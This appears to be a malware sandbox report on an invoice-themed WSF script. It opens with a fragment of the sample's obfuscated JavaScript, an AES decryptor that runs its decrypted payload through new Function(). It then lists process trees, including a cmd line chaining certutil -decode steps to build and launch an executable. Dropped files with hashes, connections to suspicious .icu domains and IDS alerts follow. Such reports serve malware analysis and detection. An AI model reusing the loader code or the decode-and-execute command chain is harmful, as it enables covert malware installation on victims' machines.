t||(t=o.CqlccWGqHP(8)),r=n.xrkoWLGoQF({KzfiCbrnue:a+v}).IOaZMzuUuc(r,t),v=o.xrkoWLGoQF(r.eZRNeHSVmZ.slice(a),4*v),r.KlwuiHJXBf=4*a,e.xrkoWLGoQF({key:r,yLIlTYUEdC:v,salt:t})}},l=r.vaJXBqfphC=c.LBLCJIeRxa({tAjRFOtDJa:c.tAjRFOtDJa.LBLCJIeRxa({kdf:f}),PYbsXnmtJA:function(r,a,v,t){return v=(t=this.tAjRFOtDJa.LBLCJIeRxa(t)).kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX),t.yLIlTYUEdC=v.yLIlTYUEdC,(r=c.PYbsXnmtJA.call(this,r,a,v.key,t)).GYRmHplwNA(v),r},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),v=t.kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX,a.gwiUkDQFxZ),t.yLIlTYUEdC=v.yLIlTYUEdC,c.IXjSHElPSb.call(this,r,a,v.key,t)}})}(),function(){for(var 
r=NKBCmUHGeG,a=r.eazSwMHLnL.BlockSQaxnzYskL,v=r.RfuCsvEMIV,o=[],t=[],n=[],i=[],s=[],u=[],h=[],e=[],c=[],f=[],l=[],p=0;p<256;p++)l[p]=p<128?p<<1:p<<1^283;var g=0,d=0;for(p=0;p<256;p++){var k=(k=d^d<<1^d<<2^d<<3^d<<4)>>>8^255&k^99;o[g]=k;var y=l[t[k]=g],w=l[y],S=l[w],_=257*l[k]^16843008*k;n[g]=_<<24|_>>>8,i[g]=_<<16|_>>>16,s[g]=_<<8|_>>>24,u[g]=_,_=16843009*S^65537*w^257*y^16843008*g,h[k]=_<<24|_>>>8,e[k]=_<<16|_>>>16,c[k]=_<<8|_>>>24,f[k]=_,g?(g=y^l[l[l[S^y]]],d^=l[l[d]]):g=d=1}var B=[0,1,2,4,8,16,32,64,128,27,54];v=v.vWLWtnhNPM=a.LBLCJIeRxa({VDrUSIMlYF:function(){for(var r=(v=this.ujgXpnylwb).eZRNeHSVmZ,a=v.KlwuiHJXBf/4,v=4*((this._nRounds=a+6)+1),t=this.ujgXpnylwbSchedule=[],n=0;n<v;n++)if(n<a)t[n]=r[n];else{var i=t[n-1];n%a?6<a&&4==n%a&&(i=o[i>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i]):(i=o[(i=i<<8|i>>>24)>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i],i^=B[n/a|0]<<24),t[n]=t[n-a]^i}for(r=this.hpsQNEkfti=[],a=0;a<v;a++)n=v-a,i=a%4?t[n]:t[n-4],r[a]=a<4||n<=4?i:h[o[i>>>24]]^e[o[i>>>16&255]]^c[o[i>>>8&255]]^f[o[255&i]]},PYbsXnmtJABlock:function(r,a){this.hXOUXbKyiS(r,a,this.ujgXpnylwbSchedule,n,i,s,u,o)},IXjSHElPSbBlock:function(r,a){var v=r[a+1];r[a+1]=r[a+3],r[a+3]=v,this.hXOUXbKyiS(r,a,this.hpsQNEkfti,h,e,c,f,t),v=r[a+1],r[a+1]=r[a+3],r[a+3]=v},hXOUXbKyiS:function(r,a,v,t,n,i,o,s){for(var u=this._nRounds,h=r[a]^v[0],e=r[a+1]^v[1],c=r[a+2]^v[2],f=r[a+3]^v[3],l=4,p=1;p<u;p++){var 
g=t[h>>>24]^n[e>>>16&255]^i[c>>>8&255]^o[255&f]^v[l++],d=t[e>>>24]^n[c>>>16&255]^i[f>>>8&255]^o[255&h]^v[l++],k=t[c>>>24]^n[f>>>16&255]^i[h>>>8&255]^o[255&e]^v[l++];f=t[f>>>24]^n[h>>>16&255]^i[e>>>8&255]^o[255&c]^v[l++],h=g,e=d,c=k}g=(s[h>>>24]<<24|s[e>>>16&255]<<16|s[c>>>8&255]<<8|s[255&f])^v[l++],d=(s[e>>>24]<<24|s[c>>>16&255]<<16|s[f>>>8&255]<<8|s[255&h])^v[l++],k=(s[c>>>24]<<24|s[f>>>16&255]<<16|s[h>>>8&255]<<8|s[255&e])^v[l++],f=(s[f>>>24]<<24|s[h>>>16&255]<<16|s[e>>>8&255]<<8|s[255&c])^v[l++],r[a]=g,r[a+1]=d,r[a+2]=k,r[a+3]=f},KzfiCbrnue:8});r.vWLWtnhNPM=a.bvTMfLRMFS(v)}(),new Function(NKBCmUHGeG.vWLWtnhNPM.IXjSHElPSb("","\x34\x34\x32\x61\x35\x62\x66\x30\x61\x64\x36\x30\x34\x66\x34\x38\x35\x66\x63\x61\x32\x36\x66\x38\x37\x33\x35\x63\x32\x33\x36\x64\x35\x34\x33\x63\x66\x65\x33\x65\x34\x64\x61\x35\x61\x34\x34\x66\x38\x34\x62\x35\x65\x39\x34\x39\x34\x31\x65\x64\x38\x38\x61\x36",{XCoXBEMuLA:dtEDoFVfAj}).toString(NKBCmUHGeG.VmLLEtCkRa.IBEHHawlRa))(); |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
716 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Copy of Docs 68_204 INVO.WSF" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2632 | "C:\Windows\System32\cmd.exe" /c ping 1.1 -n 21 & cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3996 | ping 1.1 -n 21 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2488 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2188 | cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3792 | "C:\Windows\System32\cscript.exe" "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv?.wsf" Function RegRead | C:\Windows\System32\cscript.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.8.7600.16385 | ||||
2240 | "C:\Windows\System32\cmd.exe" /c ping 1.1.1.1 -n 120 & cd "C:\Users\admin\AppData\Roaming" && certutil -decode "evFzI6iZOm" "evFzI6iZOm2" && certutil -decode "evFzI6iZOm2" "evFzI6iZOm.exe" && explorer "evFzI6iZOm.exe" | C:\Windows\System32\cmd.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2208 | ping 1.1.1.1 -n 120 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3792 | cscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\word[1].txt | — | — | — |
3792 | cscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\0aaf0c56ae5396551dfa0589d5fda7abc37beea7e7d8d39b6901ffab66a493c09ecd4d69[1].txt | text | 2BB4834348AD8C7CA5DE33C569E175D4 | 0AF1E9886832E35C63AD022EF7D89EF38313173A17AA0B66C2859BDD7F984F0C |
2188 | cscript.exe | C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv | xml | E8081971D97915187371190C7D5CEBD4 | 1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E |
716 | WScript.exe | C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf | xml | E8081971D97915187371190C7D5CEBD4 | 1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E |
3792 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@rapidssl[1].txt | text | E5EECD8705F7E6228730DE0FD941769C | FB70B30C85F3D9588F145623C701D60448CC7557D19E2BCBC761A87D0B250BC2 |
3792 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@cloudown[1].txt | text | 22AD25903920B63E49B74B9DB0E703F8 | CB3DB222BD0065F38897B77B2472838E592415AC88AFAF1F0A46353698DA7937 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3792 | cscript.exe | 104.28.28.55:443 | certificate.rapidssl.icu | Cloudflare Inc | US | unknown |
3792 | cscript.exe | 104.28.0.94:443 | docs.cloudown.icu | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
docs.cloudown.icu | | suspicious |
certificate.rapidssl.icu | | unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
3792 | cscript.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.icu) in TLS SNI |